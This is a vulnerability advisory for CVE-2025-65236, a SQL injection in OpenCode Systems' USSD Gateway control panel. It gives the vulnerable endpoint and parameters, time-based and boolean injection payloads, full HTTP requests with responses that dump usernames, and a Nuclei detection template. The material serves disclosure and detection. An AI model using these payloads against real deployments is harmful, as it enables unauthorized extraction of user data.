# \[CVE-2025-65236] USSD Gateway SQL Injection - Sessions ## Description SQL Injection in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems ](https://opencode.com/) allows the user who has an access to the vulnerable function to dump the database by injecting SQL commands. \ ## Application Details * **Name**: USSD Gateway * **Vendor**: OpenCode Systems * **Version**: OC Release 5 - Version 6.13.11 ## Technical Details * **Vulnerable Endpoint**: `/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t` * **Vulnerable Parameters**: `flt_sessid` and `flt_user` * **Payload Sample:** `flt_sessid=1; SELECT SLEEP(5)#` ## Exploitation The default request is being used to get the username of the account details based on the account ID, the response is shown below

POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2
Host: hostname
Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002&flt_user=&flt_server_node=VSSTEST01AOCFRV

```http HTTP/2 200 OK [...] [...] 00000002[...][...]USERNAME0127.0.0.1 [...] ``` By appending the payload to the parameter, all the usernames will be shown in the response. > You can use different payloads, the below one was used as a POC ```http POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2 Host: hostname Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0 [...] _csrf=K6[...]iB0qQ&display=1&flt_sessid=00000002'+or+1=1--+-&flt_user=&flt_server_node=VSSTEST01AOCFRV ``` ```http HTTP/2 200 OK [...] 00000002[...][...]USERNAME0127.0.0.1 00000003[...][...]USERNAME0127.0.0.1 00000004[...][...]USERNAME0127.0.0.1 00000005[...][...]USERNAME0127.0.0.1 00000006[...][...]USERNAME0127.0.0.1 [...] [...] ``` ## Nuclei Template You can use this template for easy detection. > Adjust the CSRF if required ```yaml id: ocussdgw-list_sessions-sqli-time info: name: USSD Gateway OCP Control Panel SQL Injection author: Eslam Ali Akl @eslam3kl severity: high description: | Time-based SQL injection test for the list_sessions_t endpoint. Injects a SLEEP(5) payload into the `flt_sessid` and `flt_user` parameters and flags the target if the response time indicates the SQL sleep was executed. Adjust `_csrf`, cookies or headers if authentication is required. tags: [sqli, time-based, ocpanel, ocussdgw] requests: - id: time_inject_flt_sessid method: POST path: - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t" headers: Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" X-Requested-With: "XMLHttpRequest" User-Agent: "nuclei-scan" body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002'; SELECT SLEEP(5)#&flt_user=&flt_server_node=VSSTEST01AOCFRV" matchers: - type: dsl dsl: - "duration >= 4" - id: time_inject_flt_user method: POST path: - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t" headers: Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" X-Requested-With: "XMLHttpRequest" User-Agent: "nuclei-scan" body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002&flt_user=admin'; SELECT SLEEP(5)#&flt_server_node=VSSTEST01AOCFRV" matchers: - type: dsl dsl: - "duration >= 4" ``` [^1]: the vulnerable parameter